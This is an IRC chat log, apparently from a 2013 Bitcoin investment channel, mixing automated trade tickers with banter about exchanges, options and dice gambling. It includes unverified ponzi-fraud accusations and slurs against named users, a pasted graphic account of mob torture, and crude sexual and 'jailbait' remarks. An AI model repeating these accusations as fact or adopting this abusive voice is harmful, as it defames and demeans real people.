[+] Jun 22 22:23:28 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Jun 22 22:23:51 it's actually impressive how dumb i am Jun 22 22:24:19 i dont hangout on those shitty forums Jun 22 22:24:23 never anything of value on them Jun 22 22:24:31 Chaang-Noi why do you keep defending this garr255 retard Jun 22 22:24:55 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.004021 = 0.0603 BTC [-] Jun 22 22:24:56 [BTCTC] [TAT.VIRTUALMINE] 59 @ 0.00401 = 0.2366 BTC [-] Jun 22 22:25:00 theymos wasnt he involved in some scam too ? Jun 22 22:26:27 outside of asicminer has their been a bitcoin business that has made alot of $ that wasnt a scam yet? Jun 22 22:26:50 yeah no scam there Jun 22 22:26:52 that was a scam Jun 22 22:26:55 he paid yesterday Jun 22 22:27:03 chaang i read on the forums you fell for that with 40,000 coins Jun 22 22:27:11 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Jun 22 22:27:37 i dont hangout on those shitty forums Jun 22 22:27:38 never anything of value on them Jun 22 22:27:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00401 BTC [-] Jun 22 22:27:48 Chaang-Noi btw you dont need to be quoting each line when you reply Jun 22 22:27:57 https://bitcointalk.org/index.php?topic=119490.0 Jun 22 22:28:00 [FAIL CAPTAIN] Some Facts About Chaang Noi (Goat) ช้างน้อย Jun 22 22:28:22 He is a trend chaser. Always trying to get in on the next big "money maker". This guy is like one of those infomercial yuppies that try to sell you "HOW TO MAKE MONEY DVD" but all you gotta do is "SEND HIM MONEY FIRST" and you will make a "FORTUNE!" Jun 22 22:28:24 lol Jun 22 22:29:58 [BTCTC] [DMS.MINING] 1 @ 0.016 BTC [-] Jun 22 22:30:03 chaang but you were involved in the pirate scam Jun 22 22:30:33 Hey, do I just need to get the two of you a ruler so we can settle this once in for all? Jun 22 22:31:05 wait so the forum mod was an active participant in a fraud? Jun 22 22:31:20 he wanted to run his own passthrough iirc Jun 22 22:31:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00482 BTC [+] Jun 22 22:31:41 so why arent people going after "theymos" and chaang-noi? Jun 22 22:32:03 case this is bitcoinland Jun 22 22:32:06 cause Jun 22 22:32:12 bitcoin935 http://trilema.com/2013/the-best-investments-in-the-history-of-bitcoin/ Jun 22 22:32:15 that;'d be the list. Jun 22 22:32:19 Chaang-Noi srs, stop requoting everything pls Jun 22 22:32:32 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Jun 22 22:33:02 heh Jun 22 22:33:04 chaang-noi: right so you were actively defrauding people? Jun 22 22:33:20 or did both of you not know what was happening Jun 22 22:33:27 kakobrekla which one ? Jun 22 22:33:41 which one wha Jun 22 22:33:41 t Jun 22 22:33:56 how did both of you not know 7% a week or whatver was being paid was not a scam? Jun 22 22:34:00 which one mod Jun 22 22:34:11 lol Jun 22 22:34:12 [BTCTC] [ASICMINER-PT] 1 @ 3.1369 BTC [+] Jun 22 22:34:22 theymos wanted to run a pirate passthrough or smth Jun 22 22:34:26 o. Jun 22 22:34:27 chaang right so youll basically do anything for money Jun 22 22:34:55 so if there were other participants clearly encouraging the fraud why doesnt anyone say anything? Jun 22 22:35:03 and continue using a fraudster hangout Jun 22 22:35:25 chaang yea you seem like a minion of someone else Jun 22 22:35:41 he ran a ponzi scheme? Jun 22 22:35:53 again with the requote. Jun 22 22:36:08 how did you believe someone could pay 7% a week when the bitcoin monetary supply wasnt even increasing at that rate Jun 22 22:36:50 chaang and you were an active participant, hence why dont people say anything about theymos and you Jun 22 22:36:51 [HAVELOCK] [ASICM] 53 @ 0.031378 = 1.663 BTC [+] Jun 22 22:36:53 [BTCTC] [S.MPOE-PT] 1 @ 0.00075 BTC [-] Jun 22 22:36:55 chaang: yes on tiny ammounts. Jun 22 22:37:09 you cant arb 1% a day with the size of pirate Jun 22 22:37:25 [HAVELOCK] [ASICM] 4 @ 0.031385 = 0.1255 BTC [+] Jun 22 22:37:42 you know what chaang you are a lowlife please dont use the excuse you didnt know what was happening or you were "working" for someone Jun 22 22:37:49 [HAVELOCK] [ASICM] 6 @ 0.031389 = 0.1883 BTC [+] Jun 22 22:38:00 you were encouraging an active fraud Jun 22 22:38:04 who is this guy anyway Jun 22 22:38:21 you were helping them collect peoples bitcoins with those methods Jun 22 22:38:24 passthroughs or whatever Jun 22 22:38:52 [MPEX] [S.MPOE] 10350 @ 0.00077454 = 8.0165 BTC [-] Jun 22 22:38:55 chaang i thought you were just some harmless goof not fraudster Jun 22 22:39:18 amazing how people still use a forum run by proven fraudsters Jun 22 22:39:24 or still associate with people like you Jun 22 22:39:29 i read on the threads Jun 22 22:39:40 [HAVELOCK] [ASICM] 32 @ 0.0315 = 1.008 BTC [+] Jun 22 22:39:44 when i saw your name and that pirate shit Jun 22 22:39:50 and some theymos being in it too Jun 22 22:40:47 that the guy who scammed you for 50btc Jun 22 22:41:09 [BTCTC] [TAT.ASICMINER] 8 @ 0.0313 = 0.2504 BTC [-] Jun 22 22:41:11 [BTCTC] [TAT.ASICMINER] 25 @ 0.0315 = 0.7875 BTC [+] Jun 22 22:41:44 matthew? Jun 22 22:42:20 so you were a little helper too during the pirate thing Jun 22 22:42:23 lol amazing Jun 22 22:42:53 who is matthew Jun 22 22:43:20 [BTCTC] [TAT.ASICMINER] 32 @ 0.0315 = 1.008 BTC [+] Jun 22 22:43:27 why is a known fraudster(chaang-noi) allowed to hangout in this investment chat? Jun 22 22:43:46 [HAVELOCK] [ASICM] 43 @ 0.0315 = 1.3545 BTC [+] Jun 22 22:44:15 bagman for theymos Jun 22 22:45:13 no thats you Jun 22 22:45:25 you were also a bag man Jun 22 22:45:32 by helping them out Jun 22 22:45:37 afaik only professional trolls are ever banned from this channel. Jun 22 22:46:05 thenw hy is chaang-noi in here? hes both a fraudster and a troll Jun 22 22:46:16 come on, tiberius was a pro Jun 22 22:46:21 you're a hobbyist Jun 22 22:46:39 chaang-noi probably how you accumulated your coins Jun 22 22:46:52 mhmm Jun 22 22:46:53 who pays you to troll? Jun 22 22:47:10 chaang noi you were actively participating in a ponzi scheme Jun 22 22:47:18 seemed you were desperate for money at that time Jun 22 22:47:37 sec? Jun 22 22:47:51 how can anyone do anything to you when you are in asia Jun 22 22:48:09 you pirate theymos and whoever else were actively running major fraud Jun 22 22:48:47 no i just find it strange that people continue to talk to you Jun 22 22:48:55 a lowlife scam artist Jun 22 22:49:29 chaang i thought you were just a kid trolling around not actually defrauding people Jun 22 22:49:34 you must have been desperate in those days Jun 22 22:49:51 "University of Illinois Law School's Professor Robert Lawless, a national expert in personal credit and bankruptcy" Jun 22 22:49:55 shit;'s too good to fake. Jun 22 22:50:38 mircea_popescu so you have no issues with active fraudsters/scam artists hanging around your chat Jun 22 22:50:48 [BTCTC] [COGNITIVE] 1 @ 0.30442 BTC [+] Jun 22 22:50:56 chaang i read who you were, a fraudster. Jun 22 22:51:16 of course your boss will give you aVIP tag Jun 22 22:51:19 it's not my chat. Jun 22 22:51:35 chaang you admitted to it. you were theymos bagman Jun 22 22:51:39 because he hired you Jun 22 22:52:01 well he promised to pay you at the beginning Jun 22 22:52:11 of course 1 scammer will scam another lol Jun 22 22:52:31 how am i lieing its all over that forum you were actively defending and encouraging people to participate in a ponzi scheme Jun 22 22:53:11 chaang-noi: right so you were actively defrauding people? i was paid to do things Jun 22 22:53:15 lol Jun 22 22:53:23 you admitted to it just 10 min ago man Jun 22 22:53:49 chaang noi at least if you are a liar and a denier try to keep it consistent. Jun 22 22:54:18 [BTCTC] [DMS.MINING] 5 @ 0.016 = 0.08 BTC [-] Jun 22 22:54:30 [BTCTC] [ASICMINER-PT] 1 @ 3.1369 BTC [+] Jun 22 22:56:02 you just said you were paid to do things. Jun 22 22:56:09 why are you changing what you just said. Jun 22 22:56:45 [BTCTC] [BITVPS] 1 @ 0.00142 BTC [+] Jun 22 22:57:02 there is a lengthy paper trail of you actively encouraging/participating in and assisting the pirate fraud chaang-noi. Jun 22 22:57:10 [BTCTC] [COGNITIVE] 4 @ 0.30442 = 1.2177 BTC [+] Jun 22 22:57:55 nothing I should be. Jun 22 22:58:46 lol i liked how chaang-noi tries to cover his involvement in the fraud by pretending he cares that people recieve their $ back Jun 22 22:59:04 [MPEX] [S.MPOE] 3172 @ 0.00077344 = 2.4534 BTC [-] Jun 22 23:03:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.0315 = 0.126 BTC [+] Jun 22 23:04:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.0315 = 0.1575 BTC [+] Jun 22 23:04:53 [BTCTC] [DMS.MINING] 1 @ 0.016499 BTC [+] Jun 22 23:06:50 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.00401 = 0.0802 BTC [-] Jun 22 23:06:52 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.004 = 0.32 BTC [-] Jun 22 23:07:47 [BTCTC] [DMS.PURCHASE] 1 @ 0.054282 BTC [-] Jun 22 23:08:23 [BTCTC] [TAT.VIRTUALMINE] 117 @ 0.004 = 0.468 BTC [-] Jun 22 23:10:00 [BTCTC] [S.MPOE-PT] 9 @ 0.000722 = 0.0065 BTC [-] Jun 22 23:11:47 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004649 = 0.0093 BTC [+] Jun 22 23:11:58 Once, while riding in his car, he saw a black man walking down a Chicago street. DeStefano forced the man into his car at gunpoint, took the man to his house and forced the man and his own wife to have sex with each other, all for some real or imagined grievance DeStefano had with his wife. Jun 22 23:12:09 ok, which tarantino film includes a depiction of this ? Jun 22 23:12:41 Jackie Brown? Jun 22 23:12:43 (it's not quite exact) Jun 22 23:12:43 nah Jun 22 23:13:07 Pulp Fiction? Jun 22 23:13:40 surely he has a point Jun 22 23:13:53 [BTCTC] [COGNITIVE] 2 @ 0.30442 = 0.6088 BTC [+] Jun 22 23:13:58 nope Jun 22 23:15:20 *cog Jun 22 23:15:25 Django? Jun 22 23:15:45 :) Jun 22 23:15:51 nop Jun 22 23:16:17 whats the one that was his but not his Jun 22 23:16:22 with the blonde Jun 22 23:16:54 lol wut. Jun 22 23:17:06 "In another incident, Peter Cappelletti, a collector for DeStefano, fled Chicago with $25,000 from a loan shark victim. DeStefano's men located Cappelletti in Wisconsin and brought him back to Chicago. DeStefano chained Cappelletti to a radiator and tortured him for three days. While a banquet was going on, Cappelletti was secretly being tortured in the back of the restaurant. "Kill me man, please, I'm on fire!" Cappel Jun 22 23:17:06 letti implored, to which DeStefano replied "Then we need to put the fire out" before having his men drag the severely burned Cappelletti into the dining area and forcing the man's family to urinate on him in unison. Following the banquet, the family quickly paid back the stolen money." Jun 22 23:17:13 oddly that one never made it into a film. Jun 22 23:18:34 True ROmance, thats what i was trying to remember Jun 22 23:19:40 you don't recall who played alabama ? ahaha. Jun 22 23:19:42 but no. Jun 22 23:20:52 one last guess Jun 22 23:20:55 Four Rooms Jun 22 23:21:20 aha. yep. Jun 22 23:21:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0311 BTC [-] Jun 22 23:21:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0311 BTC [-] Jun 22 23:21:43 i knew there was one with such a scene Jun 22 23:22:00 my memory is just eh Jun 22 23:22:54 hehe. poor bellhop ends up involved in some "psychodrama" as he says Jun 22 23:22:54 [BTCTC] [BASIC-MINING] 1 @ 1.222223 BTC [+] Jun 22 23:24:39 [BTCTC] [BTC-TRADING-PT] 1 @ 0.6 BTC [+] Jun 22 23:27:19 [BTCTC] [S.MPOE-PT] 187 @ 0.000721 = 0.1348 BTC [-] Jun 22 23:28:25 [BTCTC] [TAT.ASICMINER] 6 @ 0.0315 = 0.189 BTC [+] Jun 22 23:28:27 [BTCTC] [TAT.ASICMINER] 78 @ 0.0317 = 2.4726 BTC [+] Jun 22 23:28:30 [BTCTC] [TAT.ASICMINER] 13 @ 0.0317 = 0.4121 BTC [+] Jun 22 23:28:32 [BTCTC] [TAT.ASICMINER] 64 @ 0.031799 = 2.0351 BTC [+] Jun 22 23:28:45 https://bitcointalk.org/index.php?topic=238613.msg2546645#msg2546645 Jun 22 23:28:47 lol i'm famous nao Jun 22 23:28:50 Just-Dice : FREE BTC : Play or Invest Jun 22 23:30:13 lol Jun 22 23:30:15 [BTCTC] [DMS.MINING] 5 @ 0.016 = 0.08 BTC [-] Jun 22 23:30:17 [BTCTC] [DMS.MINING] 5 @ 0.016 = 0.08 BTC [-] Jun 22 23:30:28 so thats why you called him in here Jun 22 23:30:31 to warn him Jun 22 23:30:36 i'ma take yo money Jun 22 23:30:50 i assumed it was to offer a large bankroll Jun 22 23:30:53 [BTCTC] [DMS.MINING] 10 @ 0.016 = 0.16 BTC [-] Jun 22 23:31:41 [BTCTC] [DMS.MINING] 10 @ 0.0159 = 0.159 BTC [-] Jun 22 23:31:55 welp Jun 22 23:31:58 fuck this guy https://coinroll.it/user/0742-ae69-7c18 Jun 22 23:32:00 :p Jun 22 23:32:21 [BTCTC] [DMS.MINING] 10 @ 0.0158 = 0.158 BTC [-] Jun 22 23:33:10 [BTCTC] [DMS.MINING] 5 @ 0.0157 = 0.0785 BTC [-] Jun 22 23:33:11 well it wasn't for one singel rthing Jun 22 23:33:40 you leave me to speculate and i can't resist Jun 22 23:33:47 [BTCTC] [DMS.MINING] 6 @ 0.0156 = 0.0936 BTC [-] Jun 22 23:33:49 [BTCTC] [DMS.MINING] 1 @ 0.0156 BTC [-] Jun 22 23:33:50 [BTCTC] [DMS.MINING] 4 @ 0.0156 = 0.0624 BTC [-] Jun 22 23:33:52 [BTCTC] [DMS.MINING] 25 @ 0.0156 = 0.39 BTC [-] Jun 22 23:33:53 [BTCTC] [DMS.MINING] 100 @ 0.0156 = 1.56 BTC [-] Jun 22 23:34:09 in my book, you wanna bankroll dooglus, bitpay bought 38k btc worth of mpoe Jun 22 23:34:40 [BTCTC] [DMS.MINING] 55 @ 0.0155 = 0.8525 BTC [-] Jun 22 23:34:52 is this TAT insider info? Jun 22 23:35:26 this is TAT unbridled guesswork Jun 22 23:35:39 i have others related to MP Jun 22 23:35:41 [BTCTC] [S.DICE-PT] 24 @ 0.002719 = 0.0653 BTC [+] Jun 22 23:35:43 [BTCTC] [TAT.ASICMINER] 6 @ 0.031799 = 0.1908 BTC [+] Jun 22 23:35:46 but they escape me atm Jun 22 23:36:15 [BTCTC] [CRYPTO-TRADE] 18 @ 0.2 = 3.6 BTC [+] Jun 22 23:36:54 thickasthieves proof? Jun 22 23:37:26 [16:35] this is TAT unbridled guesswork Jun 22 23:37:47 thats not enough proof? Jun 22 23:37:47 bitpay doesnt have 5million to piss away Jun 22 23:37:59 maybe they got terms Jun 22 23:38:05 and maybe youre wrong Jun 22 23:38:08 and maybe i'm wrong Jun 22 23:38:10 they dont have 5million in free $. Jun 22 23:40:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.031799 = 0.0954 BTC [+] Jun 22 23:40:45 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.0041 = 0.123 BTC [-] Jun 22 23:40:46 [BTCTC] [TAT.VIRTUALMINE] 303 @ 0.004 = 1.212 BTC [-] Jun 22 23:40:46 i also usually take MP silence as I sign i'm doing somehting right Jun 22 23:40:53 otherwise it's insults Jun 22 23:41:19 sometimes i need to play "getting warmer"with him Jun 22 23:41:27 dodge insults for a while Jun 22 23:41:31 then bam, silence Jun 22 23:41:35 could be the other way around ... insults means you're doing it right :) Jun 22 23:41:56 depends on the topic i guess Jun 22 23:41:59 mircea probably bought his own shares and made a huge seen out of it as mpex was losing marketshare to other exchanges since january Jun 22 23:42:14 scene* Jun 22 23:42:23 losing marketshare isnt quite right Jun 22 23:42:25 all of that assumes that MP knows one way or the other Jun 22 23:42:32 mpex has the same amount of assets Jun 22 23:42:42 yes and other exchanges have become larger. Jun 22 23:42:59 bitcoin935 can you just bee alittle less tolly Jun 22 23:43:02 trolly* Jun 22 23:43:03 you werent the sharpest knife in the drawer Jun 22 23:43:13 can you be a little bit smarter? Jun 22 23:43:17 ignored Jun 22 23:43:29 TAT: what did you ignore? Jun 22 23:43:37 bitcoin935 Jun 22 23:43:48 the latest troll Jun 22 23:43:50 they still typing here? Jun 22 23:43:55 yeah Jun 22 23:43:59 haha Jun 22 23:44:09 [MPEX] [S.MPOE] 5140 @ 0.00077328 = 3.9747 BTC [-] Jun 22 23:44:12 he called me dumb! Jun 22 23:44:20 the nerve Jun 22 23:44:23 :) Jun 22 23:44:28 I would have unignored just for that Jun 22 23:44:28 ;;seen mod6 Jun 22 23:44:35 ;;gribble Jun 22 23:44:38 ;;ticker Jun 22 23:44:40 lol Jun 22 23:45:06 ThickAsThieves what makes you think bitpay even has 38k ? Jun 22 23:45:07 why gribble always down? Jun 22 23:45:23 it wasnt that amount i was thinking about Jun 22 23:45:33 it was more who might need mpoe that much Jun 22 23:46:01 a wild guess, like i said Jun 22 23:46:17 was it Quentin Tarantino? Jun 22 23:46:28 ok, what do they need mpoe for ?! Jun 22 23:46:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.031799 = 0.318 BTC [+] Jun 22 23:46:57 i dunno to automate options playing to cover their bitcoin trade servcies Jun 22 23:47:14 lol shutup Jun 22 23:47:23 again a wild guess Jun 22 23:47:34 not a calculated one Jun 22 23:47:39 course they can automate it as it is Jun 22 23:48:00 it'd perhaps make more sense buying mpoe bonds Jun 22 23:48:04 Access to MPOE-BOT Jun 22 23:48:08 lol Jun 22 23:48:20 the bot is public neh ? Jun 22 23:48:32 Is it public? Jun 22 23:48:40 the algo Jun 22 23:48:45 i think is what you mean Jun 22 23:48:53 o. lol. Jun 22 23:49:39 why would someone want profit only, non-voting shares in such great quantity...? Jun 22 23:49:41 [16:47] * bitcoin935 (3246306d@gateway/web/freenode/ip.50.70.48.109) Quit (Quit: sometimes i watch "the three stooges" to take notes.) Jun 22 23:49:42 ricj Jun 22 23:49:45 rich* Jun 22 23:50:34 TAT: Your own personal troll? Jun 22 23:50:39 lol. i enjoy other people being teh target these days. Jun 22 23:50:46 the flame has been passed on! Jun 22 23:53:49 the forums are extra trolly and idiotic today Jun 22 23:54:13 all the posts in threads I follow are uber retarded Jun 22 23:54:31 i thought everyone just follows mpoe-pr Jun 22 23:55:49 i like discovering her presence incidentally Jun 22 23:55:58 oh look who dropped in! Jun 22 23:56:06 aha Jun 22 23:56:47 mpoe-pr redefines the role devil's advocate Jun 22 23:57:06 devil's messenger Jun 22 23:57:28 [BTCTC] [ASICMINER-PT] 1 @ 3.137 BTC [+] Jun 22 23:57:30 [BTCTC] [ASICMINER-PT] 1 @ 3.149 BTC [+] Jun 22 23:57:32 [BTCTC] [ASICMINER-PT] 3 @ 3.15 = 9.45 BTC [+] Jun 22 23:57:34 [BTCTC] [ASICMINER-PT] 1 @ 3.1678 BTC [+] Jun 22 23:57:38 [BTCTC] [ASICMINER-PT] 1 @ 3.168 BTC [+] Jun 22 23:57:55 yay.. I'm making unrealized profits! Jun 22 23:58:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.031799 BTC [+] Jun 22 23:59:14 i forget who it was, maybe Diablo, taught me that there's no such thing as loss, only unrealized profit Jun 23 00:00:20 I gather that conversation wasn't in the last 12 hours or so Jun 23 00:00:25 3.168???????? Jun 23 00:00:29 ffs Jun 23 00:00:40 Bug it was like 3.3 for a bit Jun 23 00:00:48 I give up Jun 23 00:00:52 time to buy Jun 23 00:00:58 we'll probly see 3.5 in a cuple weeks Jun 23 00:01:01 Bugpower: and thank you in advance Jun 23 00:01:12 not touching it Jun 23 00:01:49 There's super strong support at 3 Jun 23 00:02:08 it held up with quite a bit of volume overnight Jun 23 00:03:00 3.5 will probly bring out another round of large shareholders selling some Jun 23 00:03:10 maybe even Jutarul again Jun 23 00:03:50 I'm surprised we haven't seen more reacting to the current jump Jun 23 00:04:01 yeah, but each new ath brings a lot of publicity and even more momentum. at least for a short time periode. Jun 23 00:04:34 and am tends to not to decline at all, when a new level is reached Jun 23 00:04:40 indeed Jun 23 00:04:54 much consolidation at 2.5 too Jun 23 00:04:58 sounds like AAPL Jun 23 00:05:12 volatility will come when a real competitor steps up Jun 23 00:05:24 [BTCTC] [ASICMINER-PT] 1 @ 3.100001 BTC [-] Jun 23 00:05:27 samsung needs to get in the mining business Jun 23 00:05:57 AM should just beat them to it and make asic phones Jun 23 00:06:08 xD Jun 23 00:06:37 battery life would probably suck Jun 23 00:10:50 [BTCTC] [BITVPS] 5 @ 0.001122 = 0.0056 BTC [-] Jun 23 00:14:13 [BTCTC] [S.DICE-PT] 1 @ 0.002571 BTC [-] Jun 23 00:14:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.031799 BTC [+] Jun 23 00:17:40 [MPEX] [S.MPOE] 3050 @ 0.00077274 = 2.3569 BTC [-] Jun 23 00:19:10 [HAVELOCK] [ASICM] 30 @ 0.030401 = 0.912 BTC [-] Jun 23 00:20:37 capacitor in my house AC blew up Jun 23 00:20:54 service was here and fixed it in 20min Jun 23 00:20:56 not bad Jun 23 00:25:06 [BTCTC] [ASICMINER-PT] 1 @ 3.1672 BTC [+] Jun 23 00:26:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.031799 = 0.1272 BTC [+] Jun 23 00:28:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00419 BTC [+] Jun 23 00:28:37 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004199 = 0.021 BTC [+] Jun 23 00:32:08 http://rt.com/usa/us-hong-kong-extradition-snowden-116/ Jun 23 00:32:20 "if Hong Kong doesn't act soon, it will complicate our bilateral relations and raise questions about Hong Kong's commitment to the rule of law." Jun 23 00:35:08 http://www.bizjournals.com/sanjose/news/2013/06/21/blueseeds-pirate-incubator-gets.html Jun 23 00:35:11 Blueseed's 'pirate' incubator gets $100K from bitcoin angels - Silicon Valley Business Journal Jun 23 00:35:30 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0038 = 0.0266 BTC [-] Jun 23 00:38:34 https://www.youtube.com/watch?feature=player_embedded&v=7BmdovYztH8 Jun 23 00:38:36 Candidate Obama debates President Obama on Government Surveillance - YouTube Jun 23 00:39:25 This has been today's news you can use. Jun 23 00:39:29 .bait Jun 23 00:39:33 http://24.media.tumblr.com/tumblr_lzie6i3jsP1qd33kzo1_400.jpg Jun 23 00:40:00 she's like 30 Jun 23 00:40:02 .bait Jun 23 00:40:06 http://25.media.tumblr.com/tumblr_m49jklvhHh1qewifto1_500.jpg Jun 23 00:40:22 it isn't about jailbait? :( Jun 23 00:43:28 Hi Jun 23 00:43:35 ya, totally. the us is in a position to discuss anyone's commitment to the rule of law. Jun 23 00:43:46 Someone selling binary options or at least normal one Jun 23 00:43:50 as if after the strauss-kahn debacle anyone takes them seriously anymore. Jun 23 00:43:54 game247 mpex.co Jun 23 00:44:04 i dont have 30 Jun 23 00:44:14 BTC Jun 23 00:44:36 coinbr Jun 23 00:44:51 those are stocks Jun 23 00:44:54 not options Jun 23 00:45:02 from what i see on the sites Jun 23 00:46:01 .bait Jun 23 00:46:05 http://24.media.tumblr.com/tumblr_m3obp9OjIR1qeue86o1_500.jpg Jun 23 00:46:07 .bait Jun 23 00:46:11 http://24.media.tumblr.com/tumblr_m2e8xp5YTi1qfil7ko1_1280.jpg Jun 23 00:46:28 game247: both Jun 23 00:47:32 .bit Jun 23 00:47:34 .bait Jun 23 00:47:38 http://24.media.tumblr.com/tumblr_lzie6i3jsP1qd33kzo1_400.jpg Jun 23 00:47:49 pretty nice Jun 23 00:48:11 i will stay here long time Jun 23 00:48:23 trading of course... Jun 23 00:51:42 anyone read the good news that bitpay is no longer using mtgox? Jun 23 00:53:09 game247 i think you can probably pester jurov to broker for you Jun 23 00:53:14 or maybe other people here interested. Jun 23 00:53:33 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.004199 = 0.1512 BTC [+] Jun 23 00:53:35 [BTCTC] [TAT.VIRTUALMINE] 364 @ 0.004199 = 1.5284 BTC [+] Jun 23 00:53:58 just to make sure im getting understood Jun 23 00:54:07 i want fixed option Jun 23 00:54:43 game247 the options on mpoe are hideously expensive Jun 23 00:54:44 oh well Jun 23 00:54:57 how much i can expect on traditional option Jun 23 00:55:09 0 to how much % Jun 23 00:55:10 expect in what? Jun 23 00:55:15 in profit Jun 23 00:55:22 like percent % Jun 23 00:55:29 considering bitcoin is highly volatile, options are expensive Jun 23 00:55:42 game247 what are you talking about? Jun 23 00:56:07 like if i buy some option for 1 Jun 23 00:56:28 how much return can i expect if conditions are met Jun 23 00:56:39 how i can do the calculation Jun 23 00:56:55 i use to do fixed options Jun 23 00:57:08 but i really dont get non fixed ones Jun 23 00:57:41 explained the difference? Jun 23 00:58:28 game247 are you talking about european vs american expiry? Jun 23 00:58:50 yes Jun 23 00:58:57 the types of expiries Jun 23 00:58:58 [BTCTC] [PAJKA.BOND] 1 @ 0.055 BTC [+] Jun 23 00:59:07 and the calculation of profit Jun 23 00:59:54 youd need to pull up an options calculator Jun 23 01:02:31 sooo i just took about 10 btc off just-dice Jun 23 01:02:42 kinda cool being lucky. Jun 23 01:04:20 youre erasing all their abnormally high luck so far Jun 23 01:05:32 mp: not it's not cool being lucky, it's lucky. I think the appropriate response is -- what the hell were you thinking to gamble? Jun 23 01:06:40 and I do say that with the utmost respect -- srsly -- I honestly expected it was just someone pretending to be MP Jun 23 01:06:53 at least that site doesnt have blockchain dust Jun 23 01:07:40 If I went and won 10 BTC on sdice, I would expect MP to respond with : "You dumb fuck!" (and I think if we go back into the logs a couple weeks back, we'd find exactly that statement) Jun 23 01:08:00 mircea_popescu what happens if you close the browswer after you deposited how does it iknow its your balance? Jun 23 01:08:13 bitcoin935 cookies. also has a link Jun 23 01:08:19 also you can set up name/pw which is a good idea Jun 23 01:08:33 aknap3 i gamble on occasion, what ? Jun 23 01:08:51 once i took a chick to belgrade, went to one of their casinos, martingaled 500 bux and paid for the trip that way Jun 23 01:09:02 she fucked really well both nights. chicks dig living dangerous. Jun 23 01:09:04 whats wrong with gambling Jun 23 01:09:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.0316 = 0.158 BTC [-] Jun 23 01:09:39 so i'm a dumb fuck, what. it happens. Jun 23 01:09:42 mp: I recall a conversation where you had very heated words about gambling on sdice, so I figured it was a nice point at which to bring it up Jun 23 01:09:52 mircea_popescu what do you think about bitpay removing mtgox quotes Jun 23 01:09:55 quote it tho, now im curious. Jun 23 01:10:04 mp: I think that 10btc for you is probably a bit different than 10 btc for me :) Jun 23 01:10:05 bitcoin935 well... they're coming to sense ? Jun 23 01:10:10 aknap3 also possible. Jun 23 01:10:17 i think mtgox is under 30% market cap by the end of the year now Jun 23 01:10:19 i dunno if you were here when i was playing bigfish ? Jun 23 01:10:19 would need the logs -- which I don't have Jun 23 01:10:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0316 BTC [-] Jun 23 01:10:22 made about the same there iirc Jun 23 01:10:24 someone does Jun 23 01:10:31 campbx is going to eat all of their US clients Jun 23 01:10:49 gimme a search term Jun 23 01:10:52 i'll check Jun 23 01:10:56 dumb fuck Jun 23 01:10:58 lol Jun 23 01:11:03 probably capitalized Jun 23 01:11:12 1337 matching Jun 23 01:11:29 mircea_popescu: comment on litecoing going on mtgox Jun 23 01:11:49 nolag. Jun 23 01:11:50 gert this, Jun 23 01:11:53 get this, Jun 23 01:11:59 the last person to say dumb fuck Jun 23 01:12:04 was tiberiusiv Jun 23 01:12:39 mircea_popscu: no lag? Jun 23 01:13:21 yeah Jun 23 01:13:46 amazing how mtgox has an order book at all with that 2 week freeze Jun 23 01:13:56 altough dub did say "dumb as fuck" since then Jun 23 01:14:12 once mtgox goes, peter vessennes and go and gavin too Jun 23 01:14:14 [BTCTC] [TAT.ASICMINER] 9 @ 0.0316 = 0.2844 BTC [-] Jun 23 01:14:19 bitcoin 1k lol Jun 23 01:14:31 what's the problem with gavin ? Jun 23 01:14:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0316 BTC [-] Jun 23 01:14:48 context? Jun 23 01:14:50 its time for him and his team to step down Jun 23 01:14:56 satoshi knew his limiations Jun 23 01:15:08 limiations* Jun 23 01:15:19 limitations* Jun 23 01:15:37 and left Jun 23 01:16:36 its time for gavin to pass the baton on to a more professional development crew Jun 23 01:16:41 hes already been richly rewarded for his time Jun 23 01:17:32 01:15 (367) mp where did you get all yoru bitcoins to throw around wrecklessly with Jun 23 01:17:32 01:16 (472) o that's cute. Jun 23 01:17:32 01:16 (367) it is? you were betting 16 bitcoins Jun 23 01:17:32 01:16 (367) thats pretty fucking wreckless, what word would you use to describe that type of behavior Jun 23 01:17:32 01:16 (1) didn't you see? he was using a foolproof system Jun 23 01:17:32 01:16 (472) i have a girl doing pro domme services on bitcointalk Jun 23 01:17:32 01:17 (1) that's not reckless - that's smart Jun 23 01:17:32 01:17 (472) people pay her to be abused. Jun 23 01:18:43 lol Jun 23 01:19:04 mp needs to play on my website ffs Jun 23 01:19:31 lol Jun 23 01:20:10 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004193 = 0.0084 BTC [-] Jun 23 01:21:01 lmao Jun 23 01:22:54 Ah, finally some peace and quiet again. Jun 23 01:29:39 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Jun 23 01:29:41 mp: found quote, on that gambling thing (was bugging me) and it wasn't you... Jun 23 01:29:49 http://log.bitcoin-assets.com/?date=23-05-2013&bots=true "fucking retard" Jun 23 01:29:55 #bitcoin-assets log Jun 23 01:29:59 sorry :) Jun 23 01:30:22 ozbot: thanks captain obvious Jun 23 01:33:19 lol cool. Jun 23 01:35:28 what is just-dice Jun 23 01:35:31 link Jun 23 01:37:20 [BTCTC] 